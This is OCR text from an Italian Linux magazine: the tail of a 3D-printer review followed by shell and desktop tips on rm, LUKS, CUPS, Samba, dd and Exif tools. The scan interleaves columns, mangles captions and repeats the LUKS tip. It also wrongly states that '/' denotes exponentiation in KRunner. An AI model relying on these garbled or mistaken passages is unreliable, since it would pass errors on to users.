com) e The Free 3D Models (http://tf3dm.com/3d-models/ 
all/1/stl) che, oltre ai formati di file 3D che è necessario con- 
vertire, inizia ad ospitare i primi file STL specifici per la stam- 
pa 3D. Oltre ai modelli gratuiti è disponibile anche un vasto 
mercato di modelli a pagamento, come quello di 3D Burrito 
(http://8dburrito.com/), definito l’iTunes della stampa 3D, o il 
market Cubify di 3DSystems (http://cubify.com/). La dispo- 
nibilità poi si amplia ulteriormente se si è disposti a conver- 
tire altri formati 3D in STL. Vastissimi, ad esempio, sono i 
repository di oggetti 3D di Google SketchUp o di Blender 
liberamente scaricabili, doveè possibile reperire modelli 3D 
in variformati. 


GIUDIZIO COMPLESSIVO 


Qualità del dispositivo e dei programmi in dotazione 


Quanto sono elevati i costi d'esercizio e qual è l'impatto sull'am- 
biente? 


Contatta / Sito Web 


INFO ddt 


Pearl offre in dotazione solo materiale plastico ABS. E' in grado di 
lavorare altre nove varianti di materiale. E' possibi e stampare 
solo con un materiale alla volta. 


Numerose crepature, struttura delle stratificazioni visibile, molti 
dettagli vanno persi. Il modello riporta macchie nere, a causa di 
bruciature del materiale. Bassa solidità dell'oggetto stampato. 


Manca un software per la creazione di nuovi oggetti. Supporta la 
maggior parte dei formati di file più usati. Il menu che compare 
sulla stampante offre poche possibilità di variazioni. 


Quanto è facile gestire la stampante e i relativi programmi? | La prima messa in servizio è avvenuta con facilità. Il menu della 


Le spese per il materiale ed il costo energetico per stampare 
la statuina di Yoda, alta 4 cm, sono state di appena 28 cent. Il 
dispositivo è molto rumoroso e rilascia un odore sgradevole. 


Pearl / www.pearl.de 


stampante e del programma sono in lingua inglese. 


RISULTATI MOLTO DIVERSI 


Dopo aver utilizzato le stampanti per giorni, la redazione 
di Linux Magazine si è trovata in possesso di un’impo- 
nente “armata” di personaggi miniaturizzati in plastica. Gli 
oggetti creati con la Pearl o la Ultimaker si distinguono 
non solo dal colore, ma poiché la qualità parla da sola. 
Quelli ottenuti con la stampante Pearl presentano una 
struttura con rigature molto marcate, i singoli strati sono 
più spessi e pieni di crepe. Il dispositivo non è per niente 
all'altezza, soprattutto con i modelli ricchi di dettagli. An- 
che il calore non è ripartito in modo uniforme: su alcuni 
oggetti si intravedono piccole bruciature nere. La più co- 
stosa Ultimaker offre senza alcun dubbio una qualità de- 
cisamente più accurata. Gli oggetti presentano infatti una 
superficie nettamente più liscia, mentre le stratificazioni 
sono meno visibili e i bordi più netti. 


CONCLUSIONI 


Per quando riguarda la facilità d’uso, le stampanti 3D 
sono molto lontane dalla semplicità dei modelli a getto 
d’inchiostro. La configurazione e la gestione richiedono 
una certa preparazione tecnica e tanta pazienza. Come 
“giochino” passatempo si rivela straordinario, ma giustifi- 
ca del tutto l'elevato prezzo. Forse è meglio attendere la 
prossima generazione. 


AAA 


Materiale plastico in PLA e ABS. E' in grado di lavorare 20 
varianti di materiale, di cui sette con effetti diversi. E' possibile 
stampare solo un materiale alla volta. 


Numerosi dettagli sono riportati molto bene. Si rilevano poche, 
piccole crepe. Struttura della stratificazione poco visibile. 
Elevata solidità dell'oggetto e precisione nelle dimensioni. 


Manca un software per la creazione di nuovi oggetti. Supporta 
la maggior parte dei formati di file più usati. Il menu sul display 
della stampante offre numerose possibilità. 


La prima messa in servizio è stata molto complicata. Il menu 
della stampante e del programma sono in lingua inglese. 


La prima messa in servizio è stata molto complicata. Il menu 
della stampante e del programma sono in lingua inglese. Il 
programma per la stampa è facile da gestire. 


Ultimaking / www.ultimaker.com 
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° Tips & Tricks 


E! Trucchi e consigli per usare subito GNU/Linux come un esperto, trovare 
soluzioni rapide ai problemi e sfruttare appieno le potenzialità del sistema 
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CANCELLARE 
IN SICUREZZA 


| Il modo più veloce per rimuove- 
= re file e directory da un hard 
disk o da un qualsiasi supporto di me- 
morizzazione (ovviamente tranne CD- 
Rom e DVD-Rom) consiste nell’utilizza- 
re il comando shell rm. Si tratta di un 
tool presente su tutte le distribuzioni e 
molto utilizzato dagli utenti GNU/Linux, 
che lo trovano pratico e veloce. Pur- 
troppo, però, se non impiegato con la 
dovuta cautela, può risultare anche 
molto pericoloso. In effetti, basta un 
semplice rm * eseguito all’interno della 
directory sbagliata per eliminare, in un 
attimo, tutti i file contenuti al suo inter- 
no. Problemi di questo tipo, purtroppo, 
si verificano abbastanza spesso. Per 
ovviare a questo inconveniente, è pos- 
sibile aggiungere al comando rm l’op- 
zione -i ovvero rm -i *. Infatti, grazie a 
questo accorgimento, il programma ci 
chiederà conferma prima di rimuovere i 
file e le directory indicati. Non tutti, 
però, ricordano di utilizzare tale opzio- 
ne, quindi, è consigliabile creare un 
alias del comando inserendo la riga 
alias rm="rm -i’ all'intero del file 
«bashrc: quest'ultimo è un file nasco- 
sto (ecco perché il punto all'inizio del 
nome) presente nella nostra directory 
home di ogni utente. Grazie all’alias, 
quindi, eliminiamo definitivamente il ri- 
schio di cancellare inavvertitamente file 
e directory. Ma in alcune situazioni tale 
impostazione potrebbe risultare sco- 
moda da usare. Ad esempio, quando si 
tratta di cancellare interi alberi di direc- 
tory, sarebbe “poco pratico” dare cen- 
tinaia o migliaia di conferme. Per fortu- 
na, l'utilizzo di un qualsiasi alias può 
essere evitato semplicemente antepo- 
nendo il carattere \ (backslash) nella 


riga di comando. Pertanto nel nostro 
caso basterà eseguire \rm *. Dopo aver 
premuto Invio tutti i file saranno rimossi 
senza nessuna richiesta di conferma 
(attenzione quindi!). 


UN “DIARIO DI BORDO” 
PIU ACCESSIBILE 


te, |sistemi GNU/Linux archiviano 

Te le informazioni relative al fun- 
zionamento del sistema all'intero di 
alcuni file presenti nella directory /var/ 
log. Si tratta dei cosiddetti file di log, 
semplici file di testo visualizzabili all'oc- 
correnza utilizzando un qualsiasi editor 
o il comando cat, ad esempio cat /var/ 
log/messages. Le informazioni conte- 
nute al loro interno sono talmente tante 
che a volte è complicato individuare le 
parti che ci interessano. Per semplifica- 
retale compito è disponibile il program- 
ma Logwatch (http://sourceforge.net/ 
projects/logwatch). Per utilizzarlo, ba- 
sta eseguire, da root, il comando log- 
watch eventualmente seguito da qual- 
che opzioni. Ad esempio, per creare un 
report in formato HTML di tutti i file di 
log bisogna eseguire il comando se- 
guente (Figura 2): 


logwatch --format html 1 
--range All --detail High > 
logwatch report.html 


Nello specifico, l'opzione range per- 
mette di selezionare l’arco temporale 
dei log (All, Today, Yesterday), mentre 
con detail si definisce il livello di infor- 
mazioni che verranno utilizzate per 
compilare il rapporto: i valori sono High, 
Med, Low. Quest'ultima opzione è mol- 
to utile per limitare alle informazioni più 
importanti il contenuto del report. 


RIESECUZIONE RAPIDA 
DEI COMANDI SHELL 


La shell Bash mantiene un 

elenco (history) abbastanza 
corposo dei comandi già eseguiti 
dall’utente (file .bash_history nella 
propria directory home). Tale elenco 
può essere “sfogliato” dal terminale 
in qualsiasi momento utilizzando i ta- 
sti freccia, in modo da poter eseguire 
nuovamente un comando o per riuti- 
lizzario dopo avergli applicato alcune 
modifiche. Sono disponibili, però, 
anche alcune scorciatoie per l’ese- 
cuzione diretta dei comandi, che 
permettono di essere velocissimi 
nelle operazioni da terminale, in par- 
ticolare per rieseguirli con permessi 
diversi. 
Ad esempio, eseguendo come uten- 
te normale il comando Is /root (legge 
il contenuto della directory dell’uten- 
te amministratore), è ovvio che il 
sistema ci negherà l’accesso. Per 
ottenere il risultato corretto, quindi, 
dovremo eseguire nuovamente il 
comando facendolo precedere da 
sudo o in alternativa, come un vero 
professionista della shell, eseguire 
semplicemente sudo !! e premere 
Invio. La direttiva del doppio punto 
esclamativo viene, infatti, interpre- 
tata dalla shell come riesecuzione 
dell'ultimo comando, che in questo 
caso viene “appeso” a sudo. || pun- 
to esclamativo può anche essere 
seguito da un numero negativo, per 
indicare la posizione del comando 
da richiamare rispetto all’ultimo. Ad 
esempio, dopo aver eseguito in suc- 
cessione i comandi echo ‘1’, echo 
‘2’ e echo ‘3’, potremo riutilizzare 
il primo con i permessi di root ese- 
guendo sudo !-3. Anche questa 


seconda caratteristica della shell è, 
quindi, molto comoda, ma richiede, 
rispetto alla prima, di prestare molta 
più attenzione, poiché un eventuale 
errore nell'inserimento del numero 
potrebbe richiamare un comando 
non desiderato e magari pericoloso. 


GESTIRE HARD DISK 
E PARTIZIONI CIFRATE 


sy, Per proteggere i nostri dati, 
molte distro, durante la fase di 
installazione, propongono di cifrare 
hard disk e partizioni. Fin qui nessun 
problema. Ma cosa succede se vo- 
gliamo accedere a questi stessi dati 
da un'altra distro GNU/Linux? Ebbe- 
ne, in questi casi bisogna provvedere 
a montare manualmente il disco fisso 
o la partizione cifrata. Analizziamo al- 
lora tutti i passaggi necessari per svol- 
gere tale operazione con LUKS, acro- 
nimo di Linux Unified Key Setup 
(http:/code.google.com/p/cryptsetup). Per 
prima cosa, bisogna individuare quale 
partizione contiene i dati cifrati. || 
modo più semplice per svolgere que- 


sta operazione consiste nell’utilizzare il 
programma GParted (http:/gparted. 
sourceforge.neî), ma bisogna fare atten- 
zione ad eseguirlo prima con il disco 
fisso cifrato scollegato dal PC e poi 
dopo averlo collegato. L'elemento 
mancante nel primo caso sarà proprio 
il dispositivo che ci interessa. Una vol- 
ta individuato il device principale, biso- 
gna selezionarlo utilizzando il menu a 
tendina che si trova nella parte destra 
della barra degli strumenti di GParted. 
In questo modo, il programma mo- 
strerà tutte le partizioni presenti al suo 
interno e scorrendo l’elenco sarà suffi- 
ciente individuare quella il cui file sy- 
stem è di tipo crypt-luks (in Figura 2 
questa corrisponde a /dev/sdd1). Una 
volta individuata la partizione, dobbia- 
mo utilizzare il comando cryptsetup 
per “sbloccare” il contenuto: crypt- 
setup -v luksOpen /dev/sdd1 disco_ 
cifrato. Il nome disco_cifrato indica il 
dispositivo virtuale che dovremo utiliz- 
zare per montare successivamente la 
partizione e può essere definito libera- 
mente; la cosa importante è che sia 
univoco e che consenta di identificare 


il dispositivo in questione. Dopo aver 
premuto Invio, ci verrà richiesta la 
passphrase per sbloccare l’accesso 
(quella usata per la cifratura e per ac- 
cedere normalmente al disco) e, se 
questa è corretta, il programma ri- 
sponderà informandoci che lo slot è 
stato sbloccato e che il comando è 
stato eseguito con successo. Non ri- 
mane che montare il disco fisso in 
modo da renderlo accessibile. Il co- 
mando da utilizzare è mount a cui 
però dobbiamo “passare” il device ap- 
pena sbloccato: mount -o ro /dev/ 
mapper/disco_cifrato /mnt. In que- 


n Fig. 2ela paliliani cifrata con LUKS può essere 
individuata usando GParted 


GESTIRE LE STAMPANTI A DISTANZA 
Basta una semplice modifica alle impostazioni del sistema di stampa CUPS 


PS (www.cups.org) è un sistema di stampa Open 
Source installato di default sulla maggior parte delle distri- 
buzioni GNU/Linux. Tra le tante funzioni che mette a disposizione, 
troviamo anche quella che permette di amministrare in remoto 
stampanti e processi di stampa tramite una semplice e intuiti- 
va interfaccia web. Una volta installato CUPS, per accedere a 
questo pannello di gestione, basta aprire il browser e collegarsi 
all'indirizzo http://localhost:631. Trattandosi di una connessione 
di rete, siamo portati a pensare che è possibile accedere a que- 
sta interfaccia utilizzando un qualsiasi computer collegato alla 
LAN e sostituendo localhost con l’indirizzo del sistema che si 
vuole amministrare, che solitamente è quello a cui sono connes- 
se le stampanti. In realtà, per motivi di sicurezza, tale “canale” 
è disattivato, quindi, funziona solo in locale, mentre per potervi 
accedere da remoto bisogna prima abilitarlo manualmente. La 
procedura per farlo è immediata, infatti, basta accedere all’in- 
terfaccia di gestione di CUPS in locale, spostarsi nella sezione 
Amministrazione (o Administration) e selezionare la voce Con- 
senti amministrazione remota (Figura 1) presente tra le Imposta- 
zioni server (colonna a destra). Una volta eseguita la modifica, 
per rendere operativa la nuova configurazione, basta premere 
sul pulsante Cambia impostazioni (in alcuni casi potrebbe essere 


necessario riavviare il server CUPS). Ovviamente, oltre a questa 
impostazione, è anche necessario verificare che un eventuale fi- 
rewall attivo sul computer al quale è collegata la stampante da 
gestire non blocchi l’accesso da remoto, perché altrimenti la con- 
nessione verrebbe ancora negata. 
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# S 


IP) 


Is SHOME 


sto caso, abbiamo anche aggiunto 
l'opzione ro per fare in modo che il 
contenuto del disco fisso sia accessi- 
bile in sola lettura (read only). Per ac- 
cedere ai dati cifrati dovremo sempli- 
cemente entrare nella directory /mnt. 


ESEGUIRE COMANDI 
RAPIDI IN KDE 

Sez. Per eseguire un'applicazione in 
3 ambiente KDE è sufficiente pre- 
mere i tasti Alt+F2 e digitarne il nome. 
Con tale shortcut si avvia, infatti, 
KRunner, il modulo che si occupa pro- 
prio dell'esecuzione delle applicazioni. 
Ma KRunner può fare molto di più 
come, ad esempio, eseguire operazio- 
ni matematiche o comandi shell. Sono 
funzioni aggiuntive poco conosciute, 
ma pensate per velocizzare al massi- 
mo l’uso del computer. Infatti, ad 
esempio, se all’interno del campo soli- 
tamente usato per scrivere il nome del 
programma digitiamo 5*5= apparirà 
subito il risultato (25), senza bisogno di 
utilizzare la calcolatrice. Ovviamente, è 


av? X 


Esegui ls $HOME 


(x) Esegui in una finestra di terminale N 


|) Esegui come altro utente 


Nome utente Et 


Password: 


M Fig. 1 * KRunner consente di avviare programmi, 
fare calcoli ed eseguire rapidamente comandi shell di 


uso comune 


anche possibile eseguire calcoli più 
complessi, usando, ad esempio, le pa- 
rentesi, come nel caso (2*2)/4, dove il 
segno / indica l'elevazione a potenza, 
oppure richiamare funzioni come sqrt 
per la radice quadrata o sin e cos per 
quelle trigonometriche. Allo stesso 
modo, possiamo eseguire direttamen- 
te un programma shell senza dover 
prima aprire una finestra del terminale 
(Konsole). Infatti, basta digitare il co- 
mando che ci interessa, ad esempio ls 
SHOME, e, prima di premere Invio, 
cliccare sull'icona a forma di chiave in- 
glese (quella in basso a destra) e deci- 
dere se eseguire il programma nel ter- 
minale (utile in questo caso), oppure se 
utilizzare le credenziali di un altro uten- 
te. Scelto cosa vogliamo fare, premen- 
do Invio o cliccando sull'icona a forma 
di ingranaggio verrà eseguito il coman- 
do (Figura 1). 


LA SHELL 

SI "ESPANDE” 

La shell Bash consente di utiliz- 
zare le parentesi graffe per ge- 
nerare delle stringhe, ma anche 

per modificare la stessa linea di co- 

mando che abbiamo digitato. Per capi- 
re il funzionamento di questa “espan- 

sione”, basta aprire una finestra di 

terminale e, quando appare il prompt, 

digitare il comando echo espansio- 
ne_{uno,due,tre}. Premuto Invio, il si- 
stema stamperà a video le tre stringhe 
seguenti: espansione_uno espansio- 
ne_due espansione _tre. Cosa è suc- 


cesso? In pratica, la shell ha provvedu- 
to a creare delle serie di caratteri che 
contengono la parte principale del te- 
sto (nel nostro caso espansione ), e a 
queste ha aggiunto gli elementi trovati 
all’interno delle parentesi graffe e sepa- 
rati dalle virgole, che nell'esempio sono 
tre. Per capire la comodità offerta da 
questa funzione facciamo un esempio 
pratico. Supponiamo di voler generare 
una copia di un file tramite il comando 
cp. Normalmente digitiamo il comando 
e lo facciamo seguire dal nome del file 
originale e poi da quello della copia. 
Se, però, ci serviamo della funzione 
appena analizzata, ci basterà utilizzare 
la seguente sintassi: cp file_sorgen- 
tef{,.copia}. In questo caso, la shell 
espanderà il comando, per cui il primo 
elemento dopo cp sarà uguale alla 
stringa che precede le due definizioni 
con l’aggiunta del primo elemento in 
parentesi, che in questo caso è nullo 
(inizia con la virgola, che è il carattere di 
separazione degli elementi), mentre il 
secondo elemento, il nostro file di de- 
stinazione, sarà composto dal nome 
del file con l’aggiunta dell'estensione 
Copia. In pratica, è come se avessimo 
digitato cp file sorgente file_sorgen- 
te.copia. 


INDIVIDUARE 
FACILMENTE LE 
CONDIVISIONI SAMBA 
Samba (mww.samba.org) è una 
piattaforma Open Source per la 
condivisione di directory e risorse 


DIRETTAMENTE DAL SITO AL PDF 


Trasformare una pagina web in un documento utilizzabile off-line 


© visitiamo un sito e riteniamo interessante una 
determinata pagina web, possiamo salvare una copia 
del suo contenuto in formato PDF, in modo che sia sempre 
consultabile anche off-line. Per effettuare tale conversione è 
sufficiente installare il programma htmldoc, presente nei repo- 
sitory di quasi tutte le distribuzioni GNU/Linux. Questa utility, 
infatti, è in grado di trasformare un file HTML salvato in locale, 
o direttamente un indirizzo Internet che punta ad una pagina 
web, in un documento Postscript o PDF. Dopo averlo esegui- 
to bisogna, per prima cosa, indicare il documento di origine 


coeo 


se 
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clieccanco su Add Files, nel caso in cui si tratti di documenti 
locali, o su Add URL... per specificare l’indirizzo della pagina 
web che ci interessa trasformare in PDF. Poi, bisogna spostar- 
si nella sezione Output e impostare il formato di uscita come 
PDF. A questo livello è anche necessario indicare il nome e il 
percorso del file di output. Nel momento in cui si attiva la mo- 
dalità di conversione in PDF, è possibile anche agire sul livello 
di compressione del file tramite un'apposita barra (maggiore 
qualità o dimensioni contenute del documento). Per iniziare la 
conversione, basta premere il pulsante Generate. 


COPIA/INCOLLA AVANZATO 
Un sistema evoluto per gestire gli appunti di sistema 


massimo di elementi copiati (una sorta di cronologia), oppure se 
memorizzare solo gli hyperlink. 


èn, Quando si utilizza il PC è impossibile fare a meno della fun- 
» zione copia/incolla. Il sistema operativo gestisce al meglio 
gli appunti di sistema, come vengono chiamati gli elementi copia- 
ti, ma volendo esistono alcuni programmi in grado di ampliare le 
possibilità offerte da tale funzione. Questi programmi permettono 
di gestire più elementi copiati contemporaneamente, in modo da 
poterli riutilizzare più facilmente in caso di necessità. Le applica- 
zioni di questo tipo si chiamano clipboard manager e per Gnome è 
disponibile Parcellite (http://parcellite.sourceforge.nef. Questo pro- 
gramma, una volta eseguito, mantiene in memoria un certo nume- 
ro di elementi copiati negli appunti di sistema, permettendoci così 
di selezionare di volta in volta quello che desideriamo incollare. Per 
selezionare un elemento presente nell'elenco, è sufficiente cliccare 
con il pulsante sinistro del mouse sull'icona del programma, posta 
sulla barra del desktop in alto, e attivare l'oggetto che ci interessa. 
Da questo momento in poi l'elemento selezionato è disponibile per 
essere incollato. Gli appunti di sistema possono anche essere mo- 
dificati o rimossi in funzione delle nostre esigenze. Cliccando, in- 
vece, sull'icona del programma con il pulsante destro del mouse si 
accede alla schermata Preferenze, da cui è possibile configurarne 
il funzionamento. Ad esempio, è possibile determinare il numero 


MW) Usa Copia (Ctri-C) 
M Usa Selezione Primaria 


Cronologia 
N Salva cronologia 
; pregi 
Elementi nella cronologia: | 25 al 
Varie 


O Cattura solo Hyperlink 
O Conferma prima di cancellare la cronologia 


| Agnulla }( ok | 


® Fig. 2 © La schermata di configurazione di Parcellite, il 
tool per la gestione avanzata degli appunti di sistema 


all’interno di una rete locale. Il protocol- 
lo su cui basa il suo funzionamento è 
SMB/CIFS, lo stesso utilizzato da altre 
piattaforme, in particolare Windows e 
Mac OS X. Questo permette a GNU/ 
Linux di condividere directory e risorse 
in reti miste fungendo, quindi, da ser- 
ver. Mettere in funzione un sistema di 
questo tipo è relativamente semplice. 
Molte distribuzioni, infatti, dispongono 
di applicazioni grafiche per la configu- 
razione e per la definizione delle risorse 
da condividere, mentre sui singoli si- 
stemi che dovranno accedere al server 
è sufficiente installare e configurare i 
relativi programmi client. Ed è proprio 
in questo secondo passaggio che in 
genere si incontrano alcuni problemi, in 
particolare perché all’inizio è difficile 
comprendere come sia strutturata la 
rete appena creata e come configurare 
di conseguenza i client. Per orientarsi 
meglio, è possibile ricorrere ad un par- 
ticolare comando, smbtree, incluso tra 
i tool della suite Samba. Come il nome 
lascia intuire, il suo obiettivo è fornire 
una rappresentazione ad albero delle 
condivisioni Samba. La sintassi per uti- 
lizzar tale comando è semplicissima: 


smbtree -N -U utente%password. 
Ovviamente, l'utente e la relativa pas- 
sword devono corrispondere ad uno di 
quelli impostati sul sistema server. Una 
volta premuto Invio, il programma mo- 
strerà i gruppi di lavoro rilevati sulla rete 
(i workgroup) e per ognuno di essi i 
nomi dei server che vi appartengono 
(che come standard sono preceduti dai 
caratteri \\\), oltre alle singole condivi- 
sioni che questi rendono disponibili 
(directory e stampanti). Tutti dati pre- 
ziosissimi per procedere con la confi- 
gurazione dei client. 


COMANDI SHELL 
NON AUTORIZZATI 


Alcune distribuzioni incoraggia- 
Y® no l'uso del comando sudo, in 
modo da poter permettere agli utenti 
comuni di eseguire determinati pro- 
grammi (sudo nome-comando) con i 
privilegi tipici dell’utente amministrato- 
re. Altre, invece, per aumentare il livello 
di sicurezza, negano completamente 
agli utenti “normali” di poter svolgere 
qualsiasi operazione di amministrazio- 
ne, a meno che non si diventi root uti- 


lizzando il comando su, acronimo di 
switch user o substitute user (cam- 
bia utente o sostituisci utente). In 
quest’ultimo caso, a seguito della ri- 
chiesta di esecuzione di un comando 
tramite sudo, il sistema avverte l'utente 
che non è presente nel file /etc/sudo- 
ers, che è quello utilizzato per definire 
gli utenti abilitati all'uso di sudo. Inoltre, 
l'inconveniente viene segnalato con il 
messaggio seguente: “username is 
not in the sudoers file. This incident 
will be reported”. La domanda, a que- 
sto punto, è: dove vengono registrati 
gli eventi di questo tipo? La risposta è: 
nel file auth.log, che si trova nella di- 
rectory /var/log. Quindi, come si può 
facilmente intuire, il contenuto di que- 
sto file è molto importante, in particola- 
re nel caso in cui si tratti di un sistema 
multiutente. Infatti, permette di com- 
prendere immediatamente quali utenti 
hanno tentato di svolgere operazioni di 
amministrazione senza la relativa auto- 
rizzazione e, soprattutto, quali coman- 
di hanno provato ad eseguire. Oltre a 
contenere dati sulle autorizzazioni glo- 
bali del sistema, infatti, in relazione a 
sudo, questo file contiene informazioni 
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dumping from /dev/sdb1 


circa la data e l'ora dell’evento, il nome 
dell'utente, la console da cui è stato 
eseguito, la directory di lavoro e, ovvia- 
mente, il comando che si voleva ese- 
guire (completo di percorso). Per vi- 
sualizzare il contenuto di questo file 
basta usare il comando more /var/ 
log/auth.log. Ovviamente, l’accesso 
a tale file è consentito solo all'utente 
amministratore. 


BACKUP FACILI 
E VELOCI 
“) Tramite il comando dd (disk 


dunp) è possibile creare, dal 
terminale, la copia speculare di un 


to /mnt/zzzzz/immagine_disco_di_rete.img.gz 


338.62M 
Y Advanced Settings 


bs= 


ibs= 


obs= 


Uda 


EL: 23s/ETA: 08m:27s 15,4 MB/s 


E Fig. 2 * Con gDiskDump creare la copia di backup di 
un hard disk o di una partizione è semplicissimo 


(ORAZIO I REISER IO PIOTTA 
ESEGUIRE OPERAZIONI RIPETITIVE 


Come convertire centinaia di immagini utilizzando un unico comando 


file. In questo caso specifico, però, 
il termine file assume un significato 
più ampio, infatti, nella maggior 
parte dei casi si tratta di dispositivi 
(device) di memorizzazione, come 
un disco fisso, una pendrive USB, 
una partizione, etc. In pratica, que- 
sto comando può essere utilizzato 
sia per creare la copia di backup di 
un dispositivo di memorizzazione, 
sia per ripristinarla in caso di pro- 
blemi. L'uso di dd è relativamente 
semplice, ma si tratta pur sempre 
di un programma a riga di coman- 
do, quindi, non immediato da utiliz- 
zare se non si conosce esattamen- 
te la sua sintassi. Per questo motivo 
è stata creata l’utility gDiskDump 
(https://launchpad.net/gdiskdump), 
una pratica interfaccia grafica per 
dd. Una volta eseguito gDiskDump 
(sono richiesti i privilegi di ammini- 
stratore) il programma può essere 
utilizzato seguendo una breve pro- 
cedura guidata. Per prima cosa, dal 
menu a tendina in alto a destra, bi- 
sogna scegliere l'elemento di input 
(sorgente): un file immagine, un 
hard disk (anche memorie USB e 
SD), una partizione e premere 
Avanti. A questo punto, in funzione 
della scelta fatta, è necessario se- 
lezionare l'elemento esatto che si 
vuole duplicare tra quelli che com- 
paiono all’interno della nuova fine- 


stra. L'elemento sorgente non deve 
essere in uso, quindi, nel caso si 
tratti di una partizione o di un hard 
disk, questi vanno prima “smonta- 
ti”. Cliecando sul pulsante Avanti si 
accede poi alla definizione dell’ele- 
mento di destinazione (l'output), 
che avviene in maniera simile a 
quanto appena visto. Ad esempio, 
per salvare l’immagine (la copia 
speculare) di una partizione su un 
hard disk esterno, basta scegliere 
la voce File dal menu a tendina, se- 
lezionare la directory di destinazio- 
ne e indicarne il nome. Inoltre, biso- 
gna scegliere se comprimere 
oppure no il file risultante. Nella pa- 
gina successiva si potranno impo- 
stare i parametri di dd. Infine, clic- 
cando su OK si avvia il 
“trasferimento” dei dati. A questo 
punto, gDiskDump ci ricorderà che 
procedendo tutti i dati presenti 
sull’elemento di destinazione at- 
tualmente impostato verranno can- 
cellati e, quindi, prima di iniziare ci 
chiederà un'ulteriore conferma (bi- 
sogna ovviamente prestare la mas- 
sima attenzione). Una volta avviato 
il processo non rimarrà che aspet- 
tare; una barra di progressione ci 
mostrerà l'avanzamento delle ope- 
razioni e verranno visualizzati an- 
che i dati già copiati, l’attuale velo- 
cità di trasferimento dei file e il 


Quando si devono svolgere operazioni ripetitive, ad esem- 
? pio la conversione di numerosi file, è possibile sfruttare la 
possibilità offerta dalla shell di utilizzare i cosiddetti cicli for. Chi 
ha esperienza di programmazione conosce molto bene questa 
tecnica ma, data la sua semplicità, risulta facilmente utilizzabi- 
le da ogni tipo di utente. Vediamo allora come procedere. Sup- 
poniamo, ad esempio, di voler convertire tutte le immagini JPG 
che si trovano all’interno di una determinata directory in formato 
PNG. Per prima cosa, bisogna individuare il comando da utilizza- 
re per svolgere tale operazione. Nel nostro caso abbiamo scelto 
convert, parte integrante della suite ImageMagick (www.imagema- 
gick.org). Il suo funzionamento è molto semplice: convert imma- 
gine.jpg immagine.png. Nel caso di numerose immagini, però, 
bisogna eseguire tale comando per ognuna di esse, sostituendo 


opportunamente il nome di quella da convertire e di quella con- 
vertita. Si tratta, quindi, di un lavoro molto lungo. Utilizzando un 
ciclo for, però, è sufficiente eseguire il comando seguente: for 
nome_img in *.jpg: do convert Snome_img ${nome_img%.jpg}. 
png; done. Dopo aver premuto Invio, la shell eseguirà il comando 
convert su ogni immagine con estensione .jpg che si trova nel- 
la directory corrente. Inoltre, passerà il nome di ogni immagine, 
contenuto nella variabile nome_img definita all’inizio, al comando 
e vi aggiungerà l'estensione .png per eseguirne la conversione e 
contemporaneamente per indicare il nuovo nome da assegna- 
re all'immagine convertita. Sostituendo il comando che si trova 
dopo il do e prima del punto e virgola, è possibile far eseguire al 
sistema qualsiasi operazione. | nomi delle variabili (in questo caso 
nome_img) possono essere scelti arbitrariamente. 


coco 
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FOTO: TUTTO QUELLO CHE NON SI VEDE 


Come estrarre i dati Exif inseriti automaticamente dalle digicam nelle immagini 


La maggior parte della macchine fotografiche digitali salvano le 

foto in formato JPG. Questo formato offre il duplice vantaggio 
di ridurre la dimensione delle immagini e di renderle visualizzabili su 
qualsiasi sistema. Ma questo non è tutto. Le digicam, infatti, utilizzano 
anche una sorta di estensione, chiamata Exif, mediante la quale regi- 
strano nell'immagine importantissimi dati aggiuntivi, molto utili per gli 
appassionati di fotografia. Per ogni fotografia scattata, il relativo file 
JPG conterrà, oltre al nome e al modello della macchina fotografica, 
anche tutte le impostazioni relative allo scatto: data e ora, risoluzio- 
ne, uso del flash, distanza focale, tempo di esposizione e apertura, 
sensibilità ISO, bilanciamento del bianco e altre caratteristiche spe- 
cifiche. Come se questo non bastasse, tra i dati Exif è presente una 
miniatura dell'immagine. L'accesso a questi dati è semplicissimo. Ad 
esempio, utilizzando il file manager Nautilus, basta premere con il 
tasto destro del mouse sull'immagine, scegliere Proprietà dal menu 
e poi spostarsi nella scheda Immagine. È possibile, però, accedere 
alle stesse informazioni usando un tool specifico come jhead (www. 
sentex.net/-mwandel/jhead), preziosissimo nel caso in cui desideria- 
mo processare molte immagini, ad esempio per controllare quando 
sono state scattate, la risoluzione, l’uso o meno del flash e molto altro. 
Questo programma è disponibile nei repository della maggior parte 


delle distro, quindi è facilmente installabile. Una volta installato, per 
leggere i dati Exif di una immagine, è sufficiente aprire una finestra di 
terminale, spostarsi nella directory che contiene la foto ed eseguire il 
comando seguente: jhead nome file.jpg. Dopo aver premuto Invio, 
tutti i dati dello scatto appariranno a video (Figura 1). 


M Fig. 1 » Estrazione dei dati Exif presenti all’interno 
di un'immagine JPG 


tempo stimato per portare a termi- 
ne il lavoro. Ovviamente, il pro- 
gramma può anche essere utilizza- 
to per ripristinare un'immagine 
precedentemente archiviata su un 
dispositivo: basta solo cambiare 
l’ordine della sorgente (input) e del- 
la destinazione (output). Anche in 
questo caso, prima di procedere, 
consigliamo la massima cautela. 


GESTIRE HARD DISK 
E PARTIZIONI CIFRATE 


G Per proteggere i nostri dati, 

Y È molte distro, durante la fase 
di installazione, propongono di ci- 
frare hard disk e partizioni. Fin qui 
nessun problema. Ma cosa succe- 
de se vogliamo accedere a questi 
stessi dati da un’altra distro GNU/ 
Linux? Ebbene, in questi casi biso- 
gna provvedere a montare manual- 
mente il disco fisso o la partizione 
cifrata. Analizziamo allora tutti i 
passaggi necessari per svolgere 
tale operazione con LUKS, acroni- 
mo di Linux Unified Key Setup 
(http://code.google.com/p/cryptsetup). 


Per prima cosa, bisogna individua- 
re quale partizione contiene i dati 
cifrati. Il modo più semplice per 
svolgere questa operazione consi- 
ste nell’utilizzare il programma 
GParted (http://gparted.sourceforge. 
nef), ma bisogna fare attenzione ad 
eseguirlo prima con il disco fisso 
cifrato scollegato dal PC e poi 
dopo averlo collegato. L'elemento 
mancante nel primo caso sarà pro- 
prio il dispositivo che ci interessa. 
Una volta individuato il device prin- 
cipale, bisogna selezionarlo utiliz- 
zando il menu a tendina che si tro- 
va nella parte destra della barra 
degli strumenti di GParted. In que- 
sto modo, il programma mostrerà 
tutte le partizioni presenti al suo in- 
terno e scorrendo l’elenco sarà suf- 
ficiente individuare quella il cui file 
system è di tipo crypt-luks (in Fi- 
gura 2 questa corrisponde a /dev/ 
sdd1). Una volta individuata la par- 
tizione, dobbiamo utilizzare il co- 
mando cryptsetup per “sbloccar- 
ne” il contenuto: cryptsetup -v 
luksOpen /dev/sdd1 disco_cifra- 
to. |l nome disco _cifrato indica il 


dispositivo virtuale che dovremo 
utilizzare per montare successiva- 
mente la partizione e può essere 
